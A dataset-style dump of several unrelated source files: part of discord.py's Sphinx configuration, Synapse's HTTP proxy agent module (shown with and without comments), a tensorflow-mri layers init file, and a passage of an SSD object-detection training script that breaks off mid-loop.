'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'sphinxcontrib_trio',
'details',
'exception_hierarchy',
'attributetable',
'resourcelinks',
'nitpick_file_ignorer',
]
autodoc_member_order = 'bysource'
autodoc_typehints = 'none'
extlinks = {
'issue': ('https://github.com/Rapptz/discord.py/issues/%s', 'GH-'),
}
intersphinx_mapping = {
'py': ('https://docs.python.org/3', None),
'aio': ('https://docs.aiohttp.org/en/stable/', None),
'req': ('https://docs.python-requests.org/en/latest/', None)
}
rst_prolog = """
.. |coro| replace:: This function is a |coroutine_link|_.
.. |maybecoro| replace:: This function *could be a* |coroutine_link|_.
.. |coroutine_link| replace:: *coroutine*
.. _coroutine_link: https://docs.python.org/3/library/asyncio-task.html#coroutine
"""
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'discord.py'
copyright = '2015-present, Rapptz'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ''
with open('../discord/__init__.py') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
# The full version, including alpha/beta/rc tags.
release = version
# This assumes a tag is available for final releases
branch = 'master' if version.endswith('a') else 'v' + version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
locale_dirs = ['locale/']
gettext_compact = False
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# Nitpicky mode options
nitpick_ignore_files = [
"migrating_to_async",
"migrating",
"whats_new",
]
# -- Options for HTML output ----------------------------------------------
html_experimental_html5_writer = True
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'basic'
html_context = {
'discord_invite': 'https://discord.gg/r3sSKJJ',
'discord_extensions': [
('discord.ext.commands', 'ext/commands'),
('discord.ext.tasks', 'ext/tasks'),
],
}
resource_links = {
'discord': 'https://discord.gg/r3sSKJJ',
'issues': 'https://github.com/Rapptz/discord.py/issues',
'discussions': 'https://github.com/Rapptz/discord.py/discussions',
'examples': f'https://github.com/Rapptz/discord.py/tree/{branch}/examples',
}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {
# }
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = './images/discord_py_logo.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
html_search_scorer = '_static/scorer.js'
html_js_files = [
'custom.js',
'settings.js',
'copy.js',
'sidebar.js'
]
# Output file base name for HTML help builder.
htmlhelp_basename = 'discord.pydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'discord.py.tex', 'discord.py Documentation',
'Rapptz', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'discord.py', 'discord.py Documentation',
['Rapptz'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'discord.py', 'discord.py Documentation',
'Rapptz', 'discord.py', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
def setup(app):
if app.config.language == 'ja':
app.config.intersphinx_mapping['py'] = ('https://docs.python.org/ja/3', None)
app.config.html_context['discord_invite'] = 'https://discord.gg/nXzj3dg'
app.config.resource_links['discord'] = 'https://discord.gg/nXzj3dg'
| true | true |
f7193e60bdbc11912523b4e6e6233bec11f0c404 | 11,846 | py | Python | synapse/http/proxyagent.py | User-green/synapse | 173ddbbe0b220bb28e67575079e1f775d73f967f | [
"Apache-2.0"
] | null | null | null | synapse/http/proxyagent.py | User-green/synapse | 173ddbbe0b220bb28e67575079e1f775d73f967f | [
"Apache-2.0"
] | null | null | null | synapse/http/proxyagent.py | User-green/synapse | 173ddbbe0b220bb28e67575079e1f775d73f967f | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import logging
import re
from typing import Optional, Tuple
from urllib.request import getproxies_environment, proxy_bypass_environment
import attr
from zope.interface import implementer
from twisted.internet import defer
from twisted.internet.endpoints import HostnameEndpoint, wrapClientTLS
from twisted.python.failure import Failure
from twisted.web.client import URI, BrowserLikePolicyForHTTPS, _AgentBase
from twisted.web.error import SchemeNotSupported
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IPolicyForHTTPS
from synapse.http.connectproxyclient import HTTPConnectProxyEndpoint
logger = logging.getLogger(__name__)

# Crude well-formedness check applied to request URIs before use: the whole
# byte string must consist of printable, non-whitespace ASCII (0x21-0x7e).
_VALID_URI = re.compile(br"\A[\x21-\x7e]+\Z")
@attr.s
class ProxyCredentials:
    username_password = attr.ib(type=bytes)

    def as_proxy_authorization_value(self) -> bytes:
        """
        Return the value for a Proxy-Authorization header (i.e. 'Basic abdef==').

        Returns:
            The base64-encoded ``username:password`` bytes, prefixed with the
            'Basic' authorization scheme expected by HTTP proxies.
        """
        # Encode the raw credentials, then tag them with the scheme name.
        encoded_creds = base64.encodebytes(self.username_password)
        return b"Basic " + encoded_creds
@implementer(IAgent)
class ProxyAgent(_AgentBase):
    """An Agent implementation which will use an HTTP proxy if one was requested

    Args:
        reactor: twisted reactor to place outgoing
            connections.

        proxy_reactor: twisted reactor to use for connections to the proxy server
            reactor might have some blacklisting applied (i.e. for DNS queries),
            but we need unblocked access to the proxy.

        contextFactory (IPolicyForHTTPS): A factory for TLS contexts, to control the
            verification parameters of OpenSSL. The default is to use a
            `BrowserLikePolicyForHTTPS`, so unless you have special
            requirements you can leave this as-is.

        connectTimeout (Optional[float]): The amount of time that this Agent will wait
            for the peer to accept a connection, in seconds. If 'None',
            HostnameEndpoint's default (30s) will be used.
            This is used for connections to both proxies and destination servers.

        bindAddress (bytes): The local address for client sockets to bind to.

        pool (HTTPConnectionPool|None): connection pool to be used. If None, a
            non-persistent pool instance will be created.

        use_proxy (bool): Whether proxy settings should be discovered and used
            from conventional environment variables.
    """

    def __init__(
        self,
        reactor,
        proxy_reactor=None,
        contextFactory: Optional[IPolicyForHTTPS] = None,
        connectTimeout=None,
        bindAddress=None,
        pool=None,
        use_proxy=False,
    ):
        contextFactory = contextFactory or BrowserLikePolicyForHTTPS()

        _AgentBase.__init__(self, reactor, pool)

        # Unless a dedicated proxy reactor was supplied, connections to the
        # proxy share the main reactor.
        if proxy_reactor is None:
            self.proxy_reactor = reactor
        else:
            self.proxy_reactor = proxy_reactor

        # kwargs applied to every HostnameEndpoint we build, whether it points
        # at a proxy or directly at the destination server.
        self._endpoint_kwargs = {}
        if connectTimeout is not None:
            self._endpoint_kwargs["timeout"] = connectTimeout
        if bindAddress is not None:
            self._endpoint_kwargs["bindAddress"] = bindAddress

        http_proxy = None
        https_proxy = None
        no_proxy = None
        if use_proxy:
            # Read the conventional http/https/no proxy settings from the
            # process environment.
            proxies = getproxies_environment()
            http_proxy = proxies["http"].encode() if "http" in proxies else None
            https_proxy = proxies["https"].encode() if "https" in proxies else None
            no_proxy = proxies["no"] if "no" in proxies else None

        # Parse credentials from http and https proxy connection string if present
        self.http_proxy_creds, http_proxy = parse_username_password(http_proxy)
        self.https_proxy_creds, https_proxy = parse_username_password(https_proxy)

        self.http_proxy_endpoint = _http_proxy_endpoint(
            http_proxy, self.proxy_reactor, **self._endpoint_kwargs
        )

        self.https_proxy_endpoint = _http_proxy_endpoint(
            https_proxy, self.proxy_reactor, **self._endpoint_kwargs
        )

        self.no_proxy = no_proxy

        self._policy_for_https = contextFactory

        self._reactor = reactor

    def request(self, method, uri, headers=None, bodyProducer=None):
        """
        Issue a request to the server indicated by the given uri.

        Supports `http` and `https` schemes.

        An existing connection from the connection pool may be used or a new one may be
        created.

        See also: twisted.web.iweb.IAgent.request

        Args:
            method (bytes): The request method to use, such as `GET`, `POST`, etc

            uri (bytes): The location of the resource to request.

            headers (Headers|None): Extra headers to send with the request

            bodyProducer (IBodyProducer|None): An object which can generate bytes to
                make up the body of this request (for example, the properly encoded
                contents of a file for a file upload). Or, None if the request is to
                have no body.

        Returns:
            Deferred[IResponse]: completes when the header of the response has
                been received (regardless of the response status code).

                Can fail with:
                    SchemeNotSupported: if the uri is not http or https

                    twisted.internet.error.TimeoutError if the server we are connecting
                        to (proxy or destination) does not accept a connection before
                        connectTimeout.

                    ... other things too.
        """
        uri = uri.strip()
        if not _VALID_URI.match(uri):
            raise ValueError(f"Invalid URI {uri!r}")

        parsed_uri = URI.fromBytes(uri)
        pool_key = (parsed_uri.scheme, parsed_uri.host, parsed_uri.port)
        request_path = parsed_uri.originForm

        # Honour a configured NO_PROXY setting for this destination host.
        should_skip_proxy = False
        if self.no_proxy is not None:
            should_skip_proxy = proxy_bypass_environment(
                parsed_uri.host.decode(),
                proxies={"no": self.no_proxy},
            )

        if (
            parsed_uri.scheme == b"http"
            and self.http_proxy_endpoint
            and not should_skip_proxy
        ):
            # Determine whether we need to set Proxy-Authorization headers
            if self.http_proxy_creds:
                # Set a Proxy-Authorization header
                if headers is None:
                    headers = Headers()
                headers.addRawHeader(
                    b"Proxy-Authorization",
                    self.http_proxy_creds.as_proxy_authorization_value(),
                )
            # Cache *all* connections under the same key, since we are only
            # connecting to a single destination, the proxy:
            pool_key = ("http-proxy", self.http_proxy_endpoint)
            endpoint = self.http_proxy_endpoint
            # Plain-HTTP proxying sends the absolute URI as the request target.
            request_path = uri
        elif (
            parsed_uri.scheme == b"https"
            and self.https_proxy_endpoint
            and not should_skip_proxy
        ):
            connect_headers = Headers()

            # Determine whether we need to set Proxy-Authorization headers
            if self.https_proxy_creds:
                # Set a Proxy-Authorization header
                connect_headers.addRawHeader(
                    b"Proxy-Authorization",
                    self.https_proxy_creds.as_proxy_authorization_value(),
                )

            # HTTPS is tunnelled through the proxy via an HTTP CONNECT.
            endpoint = HTTPConnectProxyEndpoint(
                self.proxy_reactor,
                self.https_proxy_endpoint,
                parsed_uri.host,
                parsed_uri.port,
                headers=connect_headers,
            )
        else:
            # not using a proxy
            endpoint = HostnameEndpoint(
                self._reactor, parsed_uri.host, parsed_uri.port, **self._endpoint_kwargs
            )

        logger.debug("Requesting %s via %s", uri, endpoint)

        # TLS is negotiated with the destination server regardless of whether
        # the bytes travel through a proxy tunnel.
        if parsed_uri.scheme == b"https":
            tls_connection_creator = self._policy_for_https.creatorForNetloc(
                parsed_uri.host, parsed_uri.port
            )
            endpoint = wrapClientTLS(tls_connection_creator, endpoint)
        elif parsed_uri.scheme == b"http":
            pass
        else:
            return defer.fail(
                Failure(
                    SchemeNotSupported("Unsupported scheme: %r" % (parsed_uri.scheme,))
                )
            )

        return self._requestWithEndpoint(
            pool_key, endpoint, method, parsed_uri, headers, bodyProducer, request_path
        )
def _http_proxy_endpoint(proxy: Optional[bytes], reactor, **kwargs):
    """Turn an http proxy setting into a client endpoint for that proxy.

    Args:
        proxy: the proxy setting in the form ``[<username>:<password>@]<host>[:<port>]``.
            Note that compared to other apps, this function currently lacks support
            for specifying a protocol schema (i.e. ``protocol://...``).
        reactor: reactor to be used to connect to the proxy
        kwargs: other args to be passed to HostnameEndpoint

    Returns:
        interfaces.IStreamClientEndpoint|None: endpoint to use to connect to the
        proxy, or None when no proxy is configured.
    """
    if proxy is None:
        return None

    # Split the connection string; port 1080 is assumed when none is given.
    proxy_host, proxy_port = parse_host_port(proxy, default_port=1080)
    return HostnameEndpoint(reactor, proxy_host, proxy_port, **kwargs)
def parse_username_password(proxy: bytes) -> Tuple[Optional[ProxyCredentials], bytes]:
    """
    Split optional credentials off a proxy declaration such as
    ``username:password@hostname:port``.

    Args:
        proxy: The proxy connection string (may also be None or empty).

    Returns:
        A 2-tuple ``(credentials, remainder)``: ``credentials`` is a
        ProxyCredentials wrapping the ``username:password`` bytes, or None when
        the string carries no credentials; ``remainder`` is the connection
        string with any credentials stripped (u:p@host:port -> host:port).
    """
    if not proxy or b"@" not in proxy:
        return None, proxy

    # rsplit, since the password itself could contain an '@' character.
    creds, hostport = proxy.rsplit(b"@", 1)
    return ProxyCredentials(creds), hostport
def parse_host_port(hostport: bytes, default_port: Optional[int] = None) -> Tuple[bytes, Optional[int]]:
    """
    Parse the hostname and port from a proxy connection byte string.

    Args:
        hostport: The proxy connection string. Must be in the form 'host[:port]'.
        default_port: The default port to return if one is not found in
            `hostport`. May be None, in which case None is returned.

    Returns:
        A tuple containing the hostname and port. Uses `default_port` (which
        may be None) if a valid port was not found in `hostport`.
    """
    # default_port's annotation is Optional[int]: None is both the default and
    # a legal value, and callers may receive it back unchanged.
    if b":" in hostport:
        # rsplit: only the text after the *last* colon is a port candidate.
        host, port = hostport.rsplit(b":", 1)
        try:
            return host, int(port)
        except ValueError:
            # The thing after the ':' wasn't a valid port; presumably this is
            # an IPv6 address. Fall through and return the whole string.
            pass
    return hostport, default_port
| 36.674923 | 92 | 0.639878 |
import base64
import logging
import re
from typing import Optional, Tuple
from urllib.request import getproxies_environment, proxy_bypass_environment
import attr
from zope.interface import implementer
from twisted.internet import defer
from twisted.internet.endpoints import HostnameEndpoint, wrapClientTLS
from twisted.python.failure import Failure
from twisted.web.client import URI, BrowserLikePolicyForHTTPS, _AgentBase
from twisted.web.error import SchemeNotSupported
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IPolicyForHTTPS
from synapse.http.connectproxyclient import HTTPConnectProxyEndpoint
logger = logging.getLogger(__name__)
_VALID_URI = re.compile(br"\A[\x21-\x7e]+\Z")
@attr.s
class ProxyCredentials:
username_password = attr.ib(type=bytes)
def as_proxy_authorization_value(self) -> bytes:
return b"Basic " + base64.encodebytes(self.username_password)
@implementer(IAgent)
class ProxyAgent(_AgentBase):
def __init__(
self,
reactor,
proxy_reactor=None,
contextFactory: Optional[IPolicyForHTTPS] = None,
connectTimeout=None,
bindAddress=None,
pool=None,
use_proxy=False,
):
contextFactory = contextFactory or BrowserLikePolicyForHTTPS()
_AgentBase.__init__(self, reactor, pool)
if proxy_reactor is None:
self.proxy_reactor = reactor
else:
self.proxy_reactor = proxy_reactor
self._endpoint_kwargs = {}
if connectTimeout is not None:
self._endpoint_kwargs["timeout"] = connectTimeout
if bindAddress is not None:
self._endpoint_kwargs["bindAddress"] = bindAddress
http_proxy = None
https_proxy = None
no_proxy = None
if use_proxy:
proxies = getproxies_environment()
http_proxy = proxies["http"].encode() if "http" in proxies else None
https_proxy = proxies["https"].encode() if "https" in proxies else None
no_proxy = proxies["no"] if "no" in proxies else None
self.http_proxy_creds, http_proxy = parse_username_password(http_proxy)
self.https_proxy_creds, https_proxy = parse_username_password(https_proxy)
self.http_proxy_endpoint = _http_proxy_endpoint(
http_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.https_proxy_endpoint = _http_proxy_endpoint(
https_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.no_proxy = no_proxy
self._policy_for_https = contextFactory
self._reactor = reactor
def request(self, method, uri, headers=None, bodyProducer=None):
uri = uri.strip()
if not _VALID_URI.match(uri):
raise ValueError(f"Invalid URI {uri!r}")
parsed_uri = URI.fromBytes(uri)
pool_key = (parsed_uri.scheme, parsed_uri.host, parsed_uri.port)
request_path = parsed_uri.originForm
should_skip_proxy = False
if self.no_proxy is not None:
should_skip_proxy = proxy_bypass_environment(
parsed_uri.host.decode(),
proxies={"no": self.no_proxy},
)
if (
parsed_uri.scheme == b"http"
and self.http_proxy_endpoint
and not should_skip_proxy
):
if self.http_proxy_creds:
if headers is None:
headers = Headers()
headers.addRawHeader(
b"Proxy-Authorization",
self.http_proxy_creds.as_proxy_authorization_value(),
)
pool_key = ("http-proxy", self.http_proxy_endpoint)
endpoint = self.http_proxy_endpoint
request_path = uri
elif (
parsed_uri.scheme == b"https"
and self.https_proxy_endpoint
and not should_skip_proxy
):
connect_headers = Headers()
if self.https_proxy_creds:
connect_headers.addRawHeader(
b"Proxy-Authorization",
self.https_proxy_creds.as_proxy_authorization_value(),
)
endpoint = HTTPConnectProxyEndpoint(
self.proxy_reactor,
self.https_proxy_endpoint,
parsed_uri.host,
parsed_uri.port,
headers=connect_headers,
)
else:
endpoint = HostnameEndpoint(
self._reactor, parsed_uri.host, parsed_uri.port, **self._endpoint_kwargs
)
logger.debug("Requesting %s via %s", uri, endpoint)
if parsed_uri.scheme == b"https":
tls_connection_creator = self._policy_for_https.creatorForNetloc(
parsed_uri.host, parsed_uri.port
)
endpoint = wrapClientTLS(tls_connection_creator, endpoint)
elif parsed_uri.scheme == b"http":
pass
else:
return defer.fail(
Failure(
SchemeNotSupported("Unsupported scheme: %r" % (parsed_uri.scheme,))
)
)
return self._requestWithEndpoint(
pool_key, endpoint, method, parsed_uri, headers, bodyProducer, request_path
)
def _http_proxy_endpoint(proxy: Optional[bytes], reactor, **kwargs):
if proxy is None:
return None
host, port = parse_host_port(proxy, default_port=1080)
return HostnameEndpoint(reactor, host, port, **kwargs)
def parse_username_password(proxy: bytes) -> Tuple[Optional[ProxyCredentials], bytes]:
if proxy and b"@" in proxy:
credentials, proxy_without_credentials = proxy.rsplit(b"@", 1)
return ProxyCredentials(credentials), proxy_without_credentials
return None, proxy
def parse_host_port(hostport: bytes, default_port: int = None) -> Tuple[bytes, int]:
if b":" in hostport:
host, port = hostport.rsplit(b":", 1)
try:
port = int(port)
return host, port
except ValueError:
# IPv6 address.
pass
return hostport, default_port
| true | true |
f7193e638c0b7630f3bb08df8302e36c5888e4d8 | 889 | py | Python | tensorflow_mri/python/layers/__init__.py | mrphys/tensorflow-mri | 46a8929aec4180aba4961f902897e02592f25da6 | [
"Apache-2.0"
] | 3 | 2021-07-28T17:22:26.000Z | 2022-03-29T15:17:26.000Z | tensorflow_mri/python/layers/__init__.py | mrphys/tensorflow-mri | 46a8929aec4180aba4961f902897e02592f25da6 | [
"Apache-2.0"
] | 1 | 2021-07-23T01:37:11.000Z | 2021-07-23T01:37:11.000Z | tensorflow_mri/python/layers/__init__.py | mrphys/tensorflow-mri | 46a8929aec4180aba4961f902897e02592f25da6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 University College London. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Neural network layers."""
from tensorflow_mri.python.layers.conv_blocks import *
from tensorflow_mri.python.layers.conv_endec import *
from tensorflow_mri.python.layers.preproc_layers import *
| 44.45 | 80 | 0.709786 |
from tensorflow_mri.python.layers.conv_blocks import *
from tensorflow_mri.python.layers.conv_endec import *
from tensorflow_mri.python.layers.preproc_layers import *
| true | true |
f7193e94de77b2cad9feb7c3c07ac84c618b271a | 13,089 | py | Python | train.py | fab464654/SSD_on_ActiveVisionDataset | 1bc6f0745241d0b45c3f257c6fb09ea0435c993e | [
"MIT"
] | null | null | null | train.py | fab464654/SSD_on_ActiveVisionDataset | 1bc6f0745241d0b45c3f257c6fb09ea0435c993e | [
"MIT"
] | null | null | null | train.py | fab464654/SSD_on_ActiveVisionDataset | 1bc6f0745241d0b45c3f257c6fb09ea0435c993e | [
"MIT"
] | null | null | null | import time
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
from model import SSD300, MultiBoxLoss
from datasets import PascalVOCDataset
from utils import *
# Data parameters
data_folder = 'google_drive/MyDrive/ColabNotebooks/Project/GT' # folder with data files
keep_difficult = True # use objects considered difficult to detect?
# Model parameters
# Not too many here since the SSD300 has a very specific structure
n_classes = len(label_map) # number of different types of objects
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Learning parameters
# NOTE(review): checkpoint is a hard-coded Google Drive path; set it to None to
# train from scratch instead of resuming.
checkpoint = "google_drive/MyDrive/checkpointsIeri/checkpoint_ssd300.pth.tar" # path to model checkpoint, None if none
batch_size = 9 # batch size
iterations = 120000 # number of iterations to train
workers = 4 # number of workers for loading data in the DataLoader
print_freq = 5 # print training status every __ batches
lr = 5e-4 # learning rate
decay_lr_at = [80000, 100000] # decay learning rate after these many iterations
decay_lr_to = 0.1 # decay learning rate to this fraction of the existing learning rate
momentum = 0.9 # momentum
weight_decay = 5e-4 # weight decay
grad_clip = None # clip if gradients are exploding, which may happen at larger batch sizes (sometimes at 32) - you will recognize it by a sorting error in the MuliBox loss calculation
# Enable the cuDNN auto-tuner (benchmark mode).
cudnn.benchmark = True
def main():
    """
    Training.

    Builds (or restores from `checkpoint`) the SSD300 model and SGD optimizer,
    constructs the Active Vision Dataset loader, then runs the epoch loop,
    saving a checkpoint after every epoch.
    """
    global start_epoch, label_map, epoch, checkpoint, decay_lr_at

    # Initialize model or load checkpoint
    if checkpoint is None:
        start_epoch = 0
        model = SSD300(n_classes=n_classes)
        # Initialize the optimizer, with twice the default learning rate for biases, as in the original Caffe repo
        biases = list()
        not_biases = list()
        for param_name, param in model.named_parameters():
            if param.requires_grad:
                if param_name.endswith('.bias'):
                    biases.append(param)
                else:
                    not_biases.append(param)
        optimizer = torch.optim.SGD(params=[{'params': biases, 'lr': 2 * lr}, {'params': not_biases}],
                                    lr=lr, momentum=momentum, weight_decay=weight_decay)
    else:
        # Resuming: the checkpoint stores the whole model/optimizer objects,
        # not just state dicts.
        checkpoint = torch.load(checkpoint)
        start_epoch = checkpoint['epoch'] + 1
        print('\nLoaded checkpoint from epoch %d.\n' % start_epoch)
        model = checkpoint['model']
        optimizer = checkpoint['optimizer']

    # Move to default device
    model = model.to(device)
    criterion = MultiBoxLoss(priors_cxcy=model.priors_cxcy).to(device)

    #import active_vision_dataset_processing.data_loading
    import transforms, active_vision_dataset

    #Include all instances (AVD instance ids 0..33)
    pick_trans = transforms.PickInstances(range(34))
    TRAIN_PATH = "./google_drive/MyDrive/ColabNotebooks/Project/trainDataset"
    train_dataset = active_vision_dataset.AVD(root=TRAIN_PATH, train=True,
                                              target_transform=pick_trans,
                                              scene_list=['Home_001_1',
                                                          'Home_002_1',
                                                          'Home_003_1',
                                                          'Home_004_1',
                                                          'Home_005_1',
                                                          'Home_006_1',
                                                          'Home_007_1',
                                                          'Home_008_1',
                                                          'Home_014_1',
                                                          'Home_011_1',
                                                          'Home_010_1',
                                                          'Office_001_1'],
                                              fraction_of_no_box=-1)

    train_loader = torch.utils.data.DataLoader(train_dataset,
                                               batch_size=batch_size,
                                               shuffle=True,
                                               collate_fn=active_vision_dataset.collate
                                               )
    """
    #I TRY TO USE THE DEFAULT DATASET LOADER::::::::::::::
    # Custom dataloaders
    train_dataset = PascalVOCDataset(data_folder,
                                     split='train',
                                     keep_difficult=keep_difficult)
    train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True,
                                               collate_fn=train_dataset.collate_fn, num_workers=workers,
                                               pin_memory=True) # note that we're passing the collate function here
    """
    # Calculate total number of epochs to train and the epochs to decay learning rate at (i.e. convert iterations to epochs)
    # To convert iterations to epochs, divide iterations by the number of iterations per epoch
    # The paper trains for 120,000 iterations with a batch size of 32, decays after 80,000 and 100,000 iterations
    # NOTE(review): the divisor below uses the paper's batch size (32) even
    # though this script trains with batch_size = 9 — confirm this is intended.
    epochs = iterations // (len(train_dataset) // 32)
    decay_lr_at = [it // (len(train_dataset) // 32) for it in decay_lr_at]

    # Epochs
    for epoch in range(start_epoch, epochs):
        # Decay learning rate at particular epochs
        if epoch in decay_lr_at:
            adjust_learning_rate(optimizer, decay_lr_to)

        # One epoch's training
        train(train_loader=train_loader,
              model=model,
              criterion=criterion,
              optimizer=optimizer,
              epoch=epoch)

        # Save checkpoint (overwrites the previous epoch's file)
        save_checkpoint(epoch, model, optimizer)
def train(train_loader, model, criterion, optimizer, epoch):
    """
    One epoch's training.

    :param train_loader: DataLoader yielding (images, labels) batches in the
        Active Vision Dataset format; each per-image annotation row is
        [xmin, ymin, xmax, ymax, instance_id, difficulty] in pixel coordinates
    :param model: SSD300 model
    :param criterion: MultiBox loss
    :param optimizer: optimizer
    :param epoch: epoch number
    """
    from torchvision import transforms as transf

    model.train()  # training mode enables dropout

    batch_time = AverageMeter()  # forward prop. + back prop. time
    data_time = AverageMeter()  # data loading time
    losses = AverageMeter()  # loss

    # The preprocessing pipeline is batch-invariant, so build it once instead
    # of once per batch (as the previous version did).
    preprocess = transf.Compose([
        transf.ToPILImage(),
        transf.Resize(300),
        transf.CenterCrop(300),
        transf.ToTensor(),
        transf.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
    ])

    start = time.time()

    # Batches
    for i, (images, labels) in enumerate(train_loader):
        data_time.update(time.time() - start)

        # Use the actual batch length: the final batch of an epoch can be
        # smaller than the global `batch_size`, and indexing by that constant
        # would raise an IndexError there.
        n_images = len(images)

        # (N, 3, 300, 300) batch of preprocessed images
        input_batch = torch.stack([preprocess(images[j]) for j in range(n_images)])

        # Ground truth must be lists of length N: one (N_o, 4) float tensor of
        # boundary-coordinate boxes and one (N_o,) long tensor of labels per
        # image, since the number of objects varies between images.
        box_list = []
        label_list = []
        for j in range(n_images):
            box_id_diff = [b for b in labels[j][0]]
            boxes_px = [l[0:4] for l in box_id_diff]
            # Convert pixel coordinates to fractional boundary coordinates.
            # Assumes 1920x1080 (width x height) frames — TODO confirm no
            # other resolutions appear in the dataset.
            for k in range(len(boxes_px)):
